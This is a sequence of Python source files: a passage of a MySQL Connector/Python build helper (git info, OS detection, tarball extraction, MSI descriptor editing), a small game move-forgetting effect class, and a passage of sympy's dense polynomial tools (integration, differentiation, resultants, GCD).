# In addition form useful information parsed from the
# above command line
parsed_line = _parse_mysql_info_line(mc_val)
if mc_key == "include":
# Lets assume all arguments are paths with "-I", "--include",..
include_dirs = [val for _, val in parsed_line]
info["include_dirs"] = include_dirs
LOGGER.debug("include_dirs: %s", " ".join(include_dirs))
elif mc_key == "libs_r":
info["link_dirs"] = [val for key, val in parsed_line
if key in ("L", "library-path",)]
info["libraries"] = [val for key, val in parsed_line
if key in ("l", "library",)]
LOGGER.debug("link_dirs: %s", " ".join(info["link_dirs"]))
LOGGER.debug("libraries: %s", " ".join(info["libraries"]))
# Try to figure out the architecture
info["arch"] = "x86_64" if sys.maxsize > 2**32 else "i386"
# Return a tuple for version instead of a string
info["version"] = tuple([int(num) if num.isdigit() else num
for num in info["version"].split(".")])
return info
def get_git_info():
"""Get Git information about the last commit.
Returns:
dict: A dict containing the information about the last commit.
"""
is_git_repo = False
if find_executable("git") is not None:
# Check if it's a Git repository
proc = Popen(["git", "--no-pager", "branch"], universal_newlines=True)
proc.communicate()
is_git_repo = proc.returncode == 0
if is_git_repo:
cmd = ["git", "log", "-n", "1", "--date=iso",
"--pretty=format:'branch=%D&date=%ad&commit=%H&short=%h'"]
proc = Popen(cmd, stdout=PIPE, universal_newlines=True)
stdout, _ = proc.communicate()
git_info = dict(parse_qsl(stdout.replace("'", "").replace("+", "%2B")
.split(",")[-1:][0].strip()))
try:
git_info["branch"] = stdout.split(",")[0].split("->")[1].strip()
except IndexError:
git_info["branch"] = stdout.split(",")[0].split("=")[1].strip()
return git_info
branch_src = os.getenv("BRANCH_SOURCE")
push_rev = os.getenv("PUSH_REVISION")
if branch_src and push_rev:
git_info = {
"branch": branch_src.split()[-1],
"date": None,
"commit": push_rev,
"short": push_rev[:7]
}
return git_info
return None
def write_info_src(version):
"""Generate docs/INFO_SRC.
Returns:
bool: ``True`` if `docs/INFO_SRC` was written successfully.
"""
git_info = get_git_info()
if git_info:
with open(os.path.join("docs", "INFO_SRC"), "w") as info_src:
info_src.write("version: {}\n".format(version))
if git_info:
info_src.write("branch: {}\n".format(git_info["branch"]))
if git_info.get("date"):
info_src.write("date: {}\n".format(git_info["date"]))
info_src.write("commit: {}\n".format(git_info["commit"]))
info_src.write("short: {}\n".format(git_info["short"]))
return True
return False
def write_info_bin(mysql_version=None, compiler=None):
"""Generate docs/INFO_BIN.
Args:
mysql_version (Optional[str]): The MySQL version.
Returns:
bool: ``True`` if `docs/INFO_BIN` was written successfully.
"""
now = NOW.strftime("%Y-%m-%d %H:%M:%S %z")
with open(os.path.join("docs", "INFO_BIN"), "w") as info_bin:
info_bin.write("build-date: {}\n".format(now))
info_bin.write("os-info: {}\n".format(platform.platform()))
if mysql_version:
info_bin.write("mysql-version: {}\n".format(mysql_version))
if compiler:
info_bin.write("compiler: {}\n".format(compiler))
def _parse_release_file(release_file):
"""Parse the contents of /etc/lsb-release or /etc/os-release file.
Returns:
A dictionary containing release information.
"""
distro = {}
if os.path.exists(release_file):
with open(release_file) as file_obj:
for line in file_obj:
key_value = line.split("=")
if len(key_value) != 2:
continue
key = key_value[0].lower()
value = key_value[1].rstrip("\n").strip('"')
distro[key] = value
return distro
def _parse_lsb_release_command():
"""Parse the output of the lsb_release command.
Returns:
A dictionary containing release information.
"""
distro = {}
with open(os.devnull, "w") as devnull:
try:
stdout = subprocess.check_output(
("lsb_release", "-a"), stderr=devnull)
except OSError:
return None
lines = stdout.decode(sys.getfilesystemencoding()).splitlines()
for line in lines:
key_value = line.split(":")
if len(key_value) != 2:
continue
key = key_value[0].replace(" ", "_").lower()
value = key_value[1].strip("\t")
distro[key] = value
return distro
def linux_distribution():
"""Try to determine the name of the Linux OS distribution name.
First try to get information from ``/etc/lsb-release`` file.
If it fails, try to get the information of ``lsb-release`` command.
And finally the information of ``/etc/os-release`` file.
Returns:
tuple: A tuple with (`name`, `version`, `codename`)
"""
distro = _parse_release_file(os.path.join("/etc", "lsb-release"))
if distro:
return (distro.get("distrib_id", ""),
distro.get("distrib_release", ""),
distro.get("distrib_codename", ""))
distro = _parse_lsb_release_command()
if distro:
return (distro.get("distributor_id", ""),
distro.get("release", ""),
distro.get("codename", ""))
distro = _parse_release_file(os.path.join("/etc", "os-release"))
if distro:
return (distro.get("name", ""),
distro.get("version_id", ""),
distro.get("version_codename", ""))
return ("", "", "")
def get_dist_name(distribution, source_only_dist=False, platname=None,
python_version=None, label="", edition=""):
"""Get the distribution name.
Get the distribution name usually used for creating the egg file. The
Python version is excluded from the name when source_only_dist is True.
The platname will be added when it is given at the end.
Returns:
str: The distribution name.
"""
name = [distribution.metadata.name]
if edition:
name.append(edition)
if label:
name.append("-{}".format(label))
name.append("-{}".format(distribution.metadata.version))
if not source_only_dist or python_version:
pyver = python_version or get_python_version()
name.append("-py{}".format(pyver))
if platname:
name.append("-{}".format(platname))
return "".join(name)
def get_magic_tag():
"""Return the magic tag for .pyc files."""
return sys.implementation.cache_tag
def unarchive_targz(tarball):
"""Unarchive a tarball.
Unarchives the given tarball. If the tarball has the extension
'.gz', it will be first uncompressed.
Returns the path to the folder of the first unarchived member.
Returns str.
"""
orig_wd = os.getcwd()
(dstdir, tarball_name) = os.path.split(tarball)
if dstdir:
os.chdir(dstdir)
if '.gz' in tarball_name:
new_file = tarball_name.replace('.gz', '')
gz = gzip.GzipFile(tarball_name)
tar = open(new_file, 'wb')
tar.write(gz.read())
tar.close()
tarball_name = new_file
tar = tarfile.TarFile(tarball_name)
tar.extractall()
os.unlink(tarball_name)
os.chdir(orig_wd)
return os.path.abspath(os.path.join(dstdir, tar.getmembers()[0].name))
def add_docs(doc_path, doc_files=None):
"""Prepare documentation files for Connector/Python."""
mkpath(doc_path)
if not doc_files:
doc_files = [
'mysql-connector-python.pdf',
'mysql-connector-python.html',
'mysql-html.css',
]
for file_name in doc_files:
# Check if we have file in docs/
doc_file = os.path.join('docs', file_name)
if not os.path.exists(doc_file):
# it might be in build/
doc_file = os.path.join('build', file_name)
if not os.path.exists(doc_file):
# we do not have it, create a fake one
LOGGER.warning("documentation '%s' does not exist; creating"
" empty", doc_file)
open(doc_file, "w").close()
if not os.path.exists(doc_file):
# don't copy yourself
copy_file(doc_file, doc_path)
# Windows MSI descriptor parser
# Customization utility functions for the C/py product msi descriptor
def _win_dll_is64bit(dll_file):
"""Check if a Windows DLL is 64 bit or not.
Raises:
ValueError: When magic of header is invalid.
IOError: When file could not be read.
OSError: when execute on none-Windows platform.
Returns:
bool: True if is a 64 bit library.
"""
if os.name != "nt":
raise OSError("win_ddl_is64bit only useful on Windows")
with open(dll_file, "rb") as fp:
# IMAGE_DOS_HEADER
e_magic = fp.read(2)
if e_magic != b'MZ':
raise ValueError("Wrong magic in header")
fp.seek(60)
offset = struct.unpack("I", fp.read(4))[0]
# IMAGE_FILE_HEADER
fp.seek(offset)
file_header = fp.read(6)
(_, machine) = struct.unpack("<4sH", file_header)
if machine == 0x014c: # IMAGE_FILE_MACHINE_I386
return False
elif machine in (0x8664, 0x2000): # IMAGE_FILE_MACHINE_I386/AMD64
return True
def _append_child_from_unparsed_xml(father_node, unparsed_xml):
"""Append child xml nodes to a node."""
dom_tree = parseString(unparsed_xml)
if dom_tree.hasChildNodes():
first_child = dom_tree.childNodes[0]
if first_child.hasChildNodes():
child_nodes = first_child.childNodes
for _ in range(len(child_nodes)):
childNode = child_nodes.item(0)
father_node.appendChild(childNode)
return
raise DistutilsInternalError("Could not Append append elements to "
"the Windows msi descriptor.")
def _get_element(dom_msi, tag_name, name=None, id_=None):
"""Get a xml element defined on Product."""
product = dom_msi.getElementsByTagName("Product")[0]
elements = product.getElementsByTagName(tag_name)
for element in elements:
if name and id_:
if element.getAttribute('Name') == name and \
element.getAttribute('Id') == id_:
return element
elif id_:
if element.getAttribute('Id') == id_:
return element
def _add_64bit_elements(dom_msi, log, add_vs_redist=True):
"""Add the properties and conditions elements to the xml msi descriptor."""
# Get the Product xml element
product = dom_msi.getElementsByTagName("Product")[0]
# Append children
if add_vs_redist:
LOGGER.info("Adding vc_red_64 element")
_append_child_from_unparsed_xml(product, VC_RED_64)
LOGGER.info("Adding only_64bit element")
_append_child_from_unparsed_xml(product, ONLY_64bit)
def add_arch_dep_elems(xml_path, result_path, for32=False, add_vs_redist=True):
"""Add the architecture dependent properties and conditions.
Args:
xml_path (str): The original xml msi descriptor path.
result_path (str): Path to save the resulting xml.
add_vs_redist (bool): Add the VS redistributable requirement.
"""
dom_msi = parse(xml_path)
if for32:
LOGGER.info("No elements to add for 32bit msi")
else:
LOGGER.info("Adding 64bit elements")
_add_64bit_elements(dom_msi, add_vs_redist)
LOGGER.info("Saving xml to:%s working directory:%s",
result_path, os.getcwd())
with open(result_path, "w+") as fp:
fp.write(dom_msi.toprettyxml())
fp.flush()
fp.close()
| 1.5625 | 2 |
game/combat/effects/forgetmoveeffect.py | Sipondo/ulix-dexflow | 5 | 12795710 | from .baseeffect import BaseEffect
class ForgetMoveEffect(BaseEffect):
def __init__(self, scene, action):
super().__init__(scene)
self.spd_on_action = 250
self.target = action.target
self.move = action.a_index
def on_action(self):
actor = self.scene.board.get_actor(self.target)
forgotten_move = actor.actions.pop(self.move)
self.scene.board.new_move = False
self.scene.board.no_skip(
f"{self.scene.board.get_actor(self.target).name} forgot {forgotten_move['name']}!", particle=""
)
return True, False, False
| 2.484375 | 2 |
sympy/polys/densetools.py | matthew-brett/sympy | 0 | 12795711 | <gh_stars>0
"""Advanced tools for dense recursive polynomials in `K[x]` or `K[X]`. """
from sympy.polys.densebasic import (
dup_strip, dmp_strip,
dup_reverse,
dup_convert, dmp_convert,
dup_degree, dmp_degree, dmp_degree_in,
dup_to_dict, dmp_to_dict,
dup_from_dict, dmp_from_dict,
dup_LC, dmp_LC, dmp_ground_LC,
dup_TC, dmp_TC, dmp_ground_TC,
dmp_zero, dmp_one, dmp_ground,
dmp_zero_p, dmp_one_p,
dmp_multi_deflate, dmp_inflate,
dup_to_raw_dict, dup_from_raw_dict,
dmp_raise, dmp_apply_pairs,
dmp_inject, dmp_zeros
)
from sympy.polys.densearith import (
dup_add_term, dmp_add_term,
dup_mul_term, dmp_mul_term,
dup_lshift, dup_rshift,
dup_neg, dmp_neg,
dup_add, dmp_add,
dup_sub, dmp_sub,
dup_mul, dmp_mul,
dup_pow, dmp_pow,
dup_div, dmp_div,
dup_rem, dmp_rem,
dup_quo, dmp_quo,
dup_exquo, dmp_exquo,
dup_prem, dmp_prem,
dup_expand, dmp_expand,
dup_add_mul, dup_sub_mul,
dup_mul_ground, dmp_mul_ground,
dup_quo_ground, dmp_quo_ground,
dup_exquo_ground, dmp_exquo_ground,
dup_max_norm, dmp_max_norm
)
from sympy.polys.galoistools import (
gf_int, gf_crt
)
from sympy.polys.polyerrors import (
HeuristicGCDFailed,
HomomorphismFailed,
RefinementFailed,
NotInvertible,
DomainError
)
from sympy.ntheory import nextprime
from sympy.utilities import (
cythonized, variations
)
from random import random as randfloat
def dup_ground_to_ring(f, K0, K1=None, **args):
"""Clear denominators, i.e. transform `K_0` to `K_1`. """
if K1 is None:
K1 = K0.get_ring()
common = K1.one
for c in f:
common = K1.lcm(common, K0.denom(c))
if not K1.is_one(common):
f = dup_mul_ground(f, common, K0)
if not args.get('convert'):
return common, f
else:
return common, dup_convert(f, K0, K1)
@cythonized("v,w")
def _rec_ground_to_ring(g, v, K0, K1):
"""XXX"""
common = K1.one
if not v:
for c in g:
common = K1.lcm(common, K0.denom(c))
else:
w = v-1
for c in g:
common = K1.lcm(common, _rec_ground_to_ring(c, w, K0, K1))
return common
@cythonized("u")
def dmp_ground_to_ring(f, u, K0, K1=None, **args):
"""Clear denominators, i.e. transform `K_0` to `K_1`. """
if not u:
return dup_ground_to_ring(f, K0, K1)
if K1 is None:
K1 = K0.get_ring()
common = _rec_ground_to_ring(f, u, K0, K1)
if not K1.is_one(common):
f = dmp_mul_ground(f, common, u, K0)
if not args.get('convert'):
return common, f
else:
return common, dmp_convert(f, u, K0, K1)
@cythonized("m,n,i,j")
def dup_integrate(f, m, K):
"""Computes indefinite integral of `f` in `K[x]`. """
if m <= 0 or not f:
return f
g = [K.zero]*m
for i, c in enumerate(reversed(f)):
n = i+1
for j in xrange(1, m):
n *= i+j+1
g.insert(0, K.quo(c, K(n)))
return g
@cythonized("m,u,v,n,i,j")
def dmp_integrate(f, m, u, K):
"""Computes indefinite integral of `f` in `x_0` in `K[X]`. """
if not u:
return dup_integrate(f, m, K)
if m <= 0 or dmp_zero_p(f, u):
return f
g, v = dmp_zeros(m, u-1, K), u-1
for i, c in enumerate(reversed(f)):
n = i+1
for j in xrange(1, m):
n *= i+j+1
g.insert(0, dmp_quo_ground(c, K(n), v, K))
return g
@cythonized("m,v,w,i,j")
def _rec_integrate_in(g, m, v, i, j, K):
"""XXX"""
if i == j:
return dmp_integrate(g, m, v, K)
w, i = v-1, i+1
return dmp_strip([ _rec_integrate_in(c, m, w, i, j, K) for c in g ], v)
@cythonized("m,j,u")
def dmp_integrate_in(f, m, j, u, K):
"""Computes indefinite integral of `f` in `x_j` in `K[X]`. """
if j < 0 or j > u:
raise IndexError("-%s <= j < %s expected, got %s" % (u, u, j))
return _rec_integrate_in(f, m, u, 0, j, K)
@cythonized("m,n,i")
def dup_diff(f, m, K):
"""m-th order derivative of a polynomial in `K[x]`. """
if m <= 0:
return f
n = dup_degree(f)
if n < m:
return []
deriv, c = [], K.one
for i in xrange(0, m):
c, n = c*K(n), n-1
for coeff in f[:-m]:
deriv.append(coeff*c)
c, n = K(n)*K.exquo(c, K(n+m)), n-1
return deriv
@cythonized("u,v,m,n,i")
def dmp_diff(f, m, u, K):
"""m-th order derivative in `x_0` of a polynomial in `K[X]`. """
if not u:
return dup_diff(f, m, K)
if m <= 0:
return f
n = dmp_degree(f, u)
if n < m:
return dmp_zero(u)
deriv, c, v = [], K.one, u-1
for i in xrange(0, m):
c, n = c*K(n), n-1
for coeff in f[:-m]:
h = dmp_mul_ground(coeff, c, v, K)
c, n = K(n)*K.exquo(c, K(n+m)), n-1
deriv.append(h)
return deriv
@cythonized("m,v,w,i,j")
def _rec_diff_in(g, m, v, i, j, K):
"""XXX"""
if i == j:
return dmp_diff(g, m, v, K)
w, i = v-1, i+1
return dmp_strip([ _rec_diff_in(c, m, w, i, j, K) for c in g ], v)
@cythonized("m,j,u")
def dmp_diff_in(f, m, j, u, K):
"""m-th order derivative in `x_j` of a polynomial in `K[X]`. """
if j < 0 or j > u:
raise IndexError("-%s <= j < %s expected, got %s" % (u, u, j))
return _rec_diff_in(f, m, u, 0, j, K)
def dup_eval(f, a, K):
"""Evaluate a polynomial at `x = a` in `K[x]` using Horner scheme. """
if not a:
return dup_TC(f, K)
result = K.zero
for c in f:
result *= a
result += c
return result
@cythonized("u,v")
def dmp_eval(f, a, u, K):
"""Evaluate a polynomial at `x_0 = a` in `K[X]` using Horner scheme. """
if not u:
return dup_eval(f, a, K)
if not a:
return dmp_TC(f, K)
result, v = dmp_LC(f, K), u-1
for coeff in f[1:]:
result = dmp_mul_ground(result, a, v, K)
result = dmp_add(result, coeff, v, K)
return result
@cythonized("v,i,j")
def _rec_eval_in(g, a, v, i, j, K):
"""XXX"""
if i == j:
return dmp_eval(g, a, v, K)
v, i = v-1, i+1
return dmp_strip([ _rec_eval_in(c, a, v, i, j, K) for c in g ], v)
@cythonized("u")
def dmp_eval_in(f, a, j, u, K):
"""Evaluate a polynomial at `x_j = a` in `K[X]` using Horner scheme. """
if j < 0 or j > u:
raise IndexError("-%s <= j < %s expected, got %s" % (u, u, j))
return _rec_eval_in(f, a, u, 0, j, K)
@cythonized("i,u")
def _rec_eval_tail(g, i, A, u, K):
"""XXX"""
if i == u:
return dup_eval(g, A[-1], K)
else:
h = [ _rec_eval_tail(c, i+1, A, u, K) for c in g ]
if i < u - len(A) + 1:
return h
else:
return dup_eval(h, A[-u+i-1], K)
@cythonized("u")
def dmp_eval_tail(f, A, u, K):
"""Evaluate a polynomial at `x_j = a_j, ...` in `K[X]`. """
if not A:
return f
if dmp_zero_p(f, u):
return dmp_zero(u - len(A))
e = _rec_eval_tail(f, 0, A, u, K)
if u == len(A)-1:
return e
else:
return dmp_strip(e, u - len(A))
@cythonized("m,v,i,j")
def _rec_diff_eval(g, m, a, v, i, j, K):
"""XXX"""
if i == j:
return dmp_eval(dmp_diff(g, m, v, K), a, v, K)
v, i = v-1, i+1
return dmp_strip([ _rec_diff_eval(c, m, a, v, i, j, K) for c in g ], v)
@cythonized("m,j,u")
def dmp_diff_eval_in(f, m, a, j, u, K):
"""Differentiate and evaluate a polynomial in `x_j` at `a` in `K[X]`. """
if j > u:
raise IndexError("-%s <= j < %s expected, got %s" % (u, u, j))
if not j:
return dmp_eval(dmp_diff(f, m, u, K), a, u, K)
return _rec_diff_eval(f, m, a, u, 0, j, K)
def dup_half_gcdex(f, g, K):
"""Half extended Euclidean algorithm in `F[x]`. """
if not K.has_Field:
raise DomainError('computation can be done only in a field')
a, b = [K.one], []
while g:
q, r = dup_div(f, g, K)
f, g = g, r
a, b = b, dup_sub_mul(a, q, b, K)
a = dup_quo_ground(a, dup_LC(f, K), K)
f = dup_monic(f, K)
return a, f
def dup_gcdex(f, g, K):
"""Extended Euclidean algorithm in `F[x]`. """
s, h = dup_half_gcdex(f, g, K)
F = dup_sub_mul(h, s, f, K)
t = dup_exquo(F, g, K)
return s, t, h
def dup_invert(f, g, K):
"""Compute multiplicative inverse of `f` in `F[x]/(g(x))`. """
s, h = dup_half_gcdex(f, g, K)
if h == [K.one]:
return dup_rem(s, g, K)
else:
raise NotInvertible("zero divisor")
@cythonized("n,m,d,k")
def dup_inner_subresultants(f, g, K):
"""Subresultant PRS algorithm in `K[x]`. """
n = dup_degree(f)
m = dup_degree(g)
if n < m:
f, g = g, f
n, m = m, n
R = [f, g]
d = n - m
b = (-K.one)**(d+1)
c = -K.one
B, D = [b], [d]
if not f or not g:
return R, B, D
h = dup_prem(f, g, K)
h = dup_mul_ground(h, b, K)
while h:
k = dup_degree(h)
R.append(h)
lc = dup_LC(g, K)
if not d:
q = c
else:
q = c**(d-1)
c = K.exquo((-lc)**d, q)
b = -lc * c**(m-k)
f, g, m, d = g, h, k, m-k
B.append(b)
D.append(d)
h = dup_prem(f, g, K)
h = dup_exquo_ground(h, b, K)
return R, B, D
def dup_subresultants(f, g, K):
"""Computes subresultant PRS of two polynomials in `K[x]`. """
return dup_inner_subresultants(f, g, K)[0]
@cythonized("s,i,du,dv,dw")
def dup_prs_resultant(f, g, K):
"""Resultant algorithm in `K[x]` using subresultant PRS. """
if not f or not g:
return (K.zero, [])
R, B, D = dup_inner_subresultants(f, g, K)
if dup_degree(R[-1]) > 0:
return (K.zero, R)
if R[-2] == [K.one]:
return (dup_LC(R[-1], K), R)
s, i = 1, 1
p, q = K.one, K.one
for b, d in zip(B, D)[:-1]:
du = dup_degree(R[i-1])
dv = dup_degree(R[i ])
dw = dup_degree(R[i+1])
if du % 2 and dv % 2:
s = -s
lc, i = dup_LC(R[i], K), i+1
p *= b**dv * lc**(du-dw)
q *= lc**(dv*(1+d))
if s < 0:
p = -p
i = dup_degree(R[-2])
res = dup_LC(R[-1], K)**i
res = K.quo(res*p, q)
return res, R
def dup_resultant(f, g, K):
"""Computes resultant of two polynomials in `K[x]`. """
return dup_prs_resultant(f, g, K)[0]
@cythonized("u,v,n,m,d,k")
def dmp_inner_subresultants(f, g, u, K):
"""Subresultant PRS algorithm in `K[X]`. """
if not u:
return dup_inner_subresultants(f, g, K)
n = dmp_degree(f, u)
m = dmp_degree(g, u)
if n < m:
f, g = g, f
n, m = m, n
R = [f, g]
d = n - m
v = u - 1
b = dmp_pow(dmp_ground(-K.one, v), d+1, v, K)
c = dmp_ground(-K.one, v)
B, D = [b], [d]
if dmp_zero_p(f, u) or dmp_zero_p(g, u):
return R, B, D
h = dmp_prem(f, g, u, K)
h = dmp_mul_term(h, b, 0, u, K)
while not dmp_zero_p(h, u):
k = dmp_degree(h, u)
R.append(h)
lc = dmp_LC(g, K)
p = dmp_pow(dmp_neg(lc, v, K), d, v, K)
if not d:
q = c
else:
q = dmp_pow(c, d-1, v, K)
c = dmp_exquo(p, q, v, K)
b = dmp_mul(dmp_neg(lc, v, K),
dmp_pow(c, m-k, v, K), v, K)
f, g, m, d = g, h, k, m-k
B.append(b)
D.append(d)
h = dmp_prem(f, g, u, K)
h = [ dmp_exquo(ch, b, v, K) for ch in h ]
return R, B, D
@cythonized("u")
def dmp_subresultants(f, g, u, K):
"""Computes subresultant PRS of two polynomials in `K[X]`. """
return dmp_inner_subresultants(f, g, u, K)[0]
@cythonized("u,v,s,i,d,du,dv,dw")
def dmp_prs_resultant(f, g, u, K):
"""Resultant algorithm in `K[X]` using subresultant PRS. """
if not u:
return dup_prs_resultant(f, g, K)
if dmp_zero_p(f, u) or dmp_zero_p(g, u):
return (dmp_zero(u-1), [])
R, B, D = dmp_inner_subresultants(f, g, u, K)
if dmp_degree(R[-1], u) > 0:
return (dmp_zero(u-1), R)
if dmp_one_p(R[-2], u, K):
return (dmp_LC(R[-1], K), R)
s, i, v = 1, 1, u-1
p = dmp_one(v, K)
q = dmp_one(v, K)
for b, d in zip(B, D)[:-1]:
du = dmp_degree(R[i-1], u)
dv = dmp_degree(R[i ], u)
dw = dmp_degree(R[i+1], u)
if du % 2 and dv % 2:
s = -s
lc, i = dmp_LC(R[i], K), i+1
p = dmp_mul(dmp_mul(p, dmp_pow(b, dv, v, K), v, K),
dmp_pow(lc, du-dw, v, K), v, K)
q = dmp_mul(q, dmp_pow(lc, dv*(1+d), v, K), v, K)
_, p, q = dmp_inner_gcd(p, q, v, K)
if s < 0:
p = dmp_neg(p, v, K)
i = dmp_degree(R[-2], u)
res = dmp_pow(dmp_LC(R[-1], K), i, v, K)
res = dmp_quo(dmp_mul(res, p, v, K), q, v, K)
return res, R
@cythonized("u,v,n,m,N,M,B")
def dmp_zz_modular_resultant(f, g, p, u, K):
"""Compute resultant of `f` and `g` modulo a prime `p`. """
if not u:
return gf_int(dup_prs_resultant(f, g, K)[0] % p, p)
v = u - 1
n = dmp_degree(f, u)
m = dmp_degree(g, u)
N = dmp_degree_in(f, 1, u)
M = dmp_degree_in(g, 1, u)
B = n*M + m*N
D, a = [K.one], -K.one
r = dmp_zero(v)
while dup_degree(D) <= B:
while True:
a += K.one
if a == p:
raise HomomorphismFailed('no luck')
F = dmp_eval_in(f, gf_int(a, p), 1, u, K)
if dmp_degree(F, v) == n:
G = dmp_eval_in(g, gf_int(a, p), 1, u, K)
if dmp_degree(G, v) == m:
break
R = dmp_zz_modular_resultant(F, G, p, v, K)
e = dmp_eval(r, a, v, K)
if not v:
R = dup_strip([R])
e = dup_strip([e])
else:
R = [R]
e = [e]
d = K.invert(dup_eval(D, a, K), p)
d = dup_mul_ground(D, d, K)
d = dmp_raise(d, v, 0, K)
c = dmp_mul(d, dmp_sub(R, e, v, K), v, K)
r = dmp_add(r, c, v, K)
r = dmp_ground_trunc(r, p, v, K)
D = dup_mul(D, [K.one, -a], K)
D = dup_trunc(D, p, K)
return r
def _collins_crt(r, R, P, p, K):
"""Wrapper of CRT for Collins's resultant algorithm. """
return gf_int(gf_crt([r, R], [P, p], K), P*p)
@cythonized("u,v,n,m")
def dmp_zz_collins_resultant(f, g, u, K):
"""Collins's modular resultant algorithm in `Z[X]`. """
n = dmp_degree(f, u)
m = dmp_degree(g, u)
if n < 0 or m < 0:
return dmp_zero(u-1)
A = dmp_max_norm(f, u, K)
B = dmp_max_norm(g, u, K)
a = dmp_ground_LC(f, u, K)
b = dmp_ground_LC(g, u, K)
v = u - 1
B = K(2)*K.factorial(n+m)*A**m*B**n
r, p, P = dmp_zero(v), K.one, K.one
while P <= B:
p = K(nextprime(p))
while not (a % p) or not (b % p):
p = K(nextprime(p))
F = dmp_ground_trunc(f, p, u, K)
G = dmp_ground_trunc(g, p, u, K)
try:
R = dmp_zz_modular_resultant(F, G, p, u, K)
except HomomorphismFailed:
continue
if K.is_one(P):
r = R
else:
r = dmp_apply_pairs(r, R, _collins_crt, (P, p, K), v, K)
P *= p
return r
@cythonized("u,n,m")
def dmp_qq_collins_resultant(f, g, u, K0):
"""Collins's modular resultant algorithm in `Q[X]`. """
n = dmp_degree(f, u)
m = dmp_degree(g, u)
if n < 0 or m < 0:
return dmp_zero(u-1)
K1 = K0.get_ring()
cf, f = dmp_ground_to_ring(f, u, K0, K1)
cg, g = dmp_ground_to_ring(g, u, K0, K1)
f = dmp_convert(f, u, K0, K1)
g = dmp_convert(g, u, K0, K1)
r = dmp_zz_collins_resultant(f, g, u, K1)
r = dmp_convert(r, u-1, K1, K0)
c = K0.convert(cf**m * cg**n, K1)
return dmp_exquo_ground(r, c, u-1, K0)
USE_COLLINS_RESULTANT = 0
@cythonized("u")
def dmp_resultant(f, g, u, K):
"""Computes resultant of two polynomials in `K[X]`. """
if not u:
return dup_resultant(f, g, K)
if K.has_Field:
if USE_COLLINS_RESULTANT and K.is_QQ:
return dmp_qq_collins_resultant(f, g, u, K)
else:
if USE_COLLINS_RESULTANT and K.is_ZZ:
return dmp_zz_collins_resultant(f, g, u, K)
return dmp_prs_resultant(f, g, u, K)[0]
@cythonized("d,s")
def dup_discriminant(f, K):
"""Computes discriminant of a polynomial in `K[x]`. """
d = dup_degree(f)
if d <= 0:
return K.zero
else:
s = (-1)**((d*(d-1)) // 2)
c = dup_LC(f, K)
r = dup_resultant(f, dup_diff(f, 1, K), K)
return K.quo(r, c*K(s))
@cythonized("u,v,d,s")
def dmp_discriminant(f, u, K):
"""Computes discriminant of a polynomial in `K[X]`. """
if not u:
return dup_discriminant(f, K)
d, v = dmp_degree(f, u), u-1
if d <= 0:
return dmp_zero(v)
else:
s = (-1)**((d*(d-1)) // 2)
c = dmp_LC(f, K)
r = dmp_resultant(f, dmp_diff(f, 1, u, K), u, K)
c = dmp_mul_ground(c, K(s), v, K)
return dmp_quo(r, c, v, K)
def _dup_rr_trivial_gcd(f, g, K):
"""Handle trivial cases in GCD algorithm over a ring. """
if not (f or g):
return [], [], []
elif not f:
if K.is_nonnegative(dup_LC(g, K)):
return g, [], [K.one]
else:
return dup_neg(g, K), [], [-K.one]
elif not g:
if K.is_nonnegative(dup_LC(f, K)):
return f, [K.one], []
else:
return dup_neg(f, K), [-K.one], []
return None
def _dup_ff_trivial_gcd(f, g, K):
"""Handle trivial cases in GCD algorithm over a field. """
if not (f or g):
return [], [], []
elif not f:
return dup_monic(g, K), [], [dup_LC(g, K)]
elif not g:
return dup_monic(f, K), [dup_LC(f, K)], []
else:
return None
USE_DMP_SIMPLIFY_GCD = 1
@cythonized("u")
def _dmp_rr_trivial_gcd(f, g, u, K):
"""Handle trivial cases in GCD algorithm over a ring. """
zero_f = dmp_zero_p(f, u)
zero_g = dmp_zero_p(g, u)
if zero_f and zero_g:
return tuple(dmp_zeros(3, u, K))
elif zero_f:
if K.is_nonnegative(dmp_ground_LC(g, u, K)):
return g, dmp_zero(u), dmp_one(u, K)
else:
return dmp_neg(g, u, K), dmp_zero(u), dmp_ground(-K.one, u)
elif zero_g:
if K.is_nonnegative(dmp_ground_LC(f, u, K)):
return f, dmp_one(u, K), dmp_zero(u)
else:
return dmp_neg(f, u, K), dmp_ground(-K.one, u), dmp_zero(u)
elif USE_DMP_SIMPLIFY_GCD:
return _dmp_simplify_gcd(f, g, u, K)
else:
return None
@cythonized("u")
def _dmp_ff_trivial_gcd(f, g, u, K):
"""Handle trivial cases in GCD algorithm over a field. """
zero_f = dmp_zero_p(f, u)
zero_g = dmp_zero_p(g, u)
if zero_f and zero_g:
return tuple(dmp_zeros(3, u, K))
elif zero_f:
return (dmp_ground_monic(g, u, K),
dmp_zero(u),
dmp_ground(dmp_ground_LC(g, u, K), u))
elif zero_g:
return (dmp_ground_monic(f, u, K),
dmp_ground(dmp_ground_LC(f, u, K), u),
dmp_zero(u))
elif USE_DMP_SIMPLIFY_GCD:
return _dmp_simplify_gcd(f, g, u, K)
else:
return None
@cythonized("u,v,df,dg")
def _dmp_simplify_gcd(f, g, u, K):
"""Try to eliminate `x_0` from GCD computation in `K[X]`. """
df = dmp_degree(f, u)
dg = dmp_degree(g, u)
if df > 0 and dg > 0:
return None
if not (df or dg):
F = dmp_LC(f, K)
G = dmp_LC(g, K)
else:
if not df:
F = dmp_LC(f, K)
G = dmp_content(g, u, K)
else:
F = dmp_content(f, u, K)
G = dmp_LC(g, K)
v = u - 1
h = dmp_gcd(F, G, v, K)
cff = [ dmp_exquo(cf, h, v, K) for cf in f ]
cfg = [ dmp_exquo(cg, h, v, K) for cg in g ]
return [h], cff, cfg
def dup_rr_prs_gcd(f, g, K):
"""Computes polynomial GCD using subresultants over a ring. """
result = _dup_rr_trivial_gcd(f, g, K)
if result is not None:
return result
fc, F = dup_primitive(f, K)
gc, G = dup_primitive(g, K)
c = K.gcd(fc, gc)
h = dup_subresultants(F, G, K)[-1]
_, h = dup_primitive(h, K)
if K.is_negative(dup_LC(h, K)):
c = -c
h = dup_mul_ground(h, c, K)
cff = dup_exquo(f, h, K)
cfg = dup_exquo(g, h, K)
return h, cff, cfg
def dup_ff_prs_gcd(f, g, K):
"""Computes polynomial GCD using subresultants over a field. """
result = _dup_ff_trivial_gcd(f, g, K)
if result is not None:
return result
h = dup_subresultants(f, g, K)[-1]
h = dup_monic(h, K)
cff = dup_exquo(f, h, K)
cfg = dup_exquo(g, h, K)
return h, cff, cfg
@cythonized("u")
def dmp_rr_prs_gcd(f, g, u, K):
"""Computes polynomial GCD using subresultants over a ring. """
if not u:
return dup_rr_prs_gcd(f, g, K)
result = _dmp_rr_trivial_gcd(f, g, u, K)
if result is not None:
return result
fc, F = dmp_primitive(f, u, K)
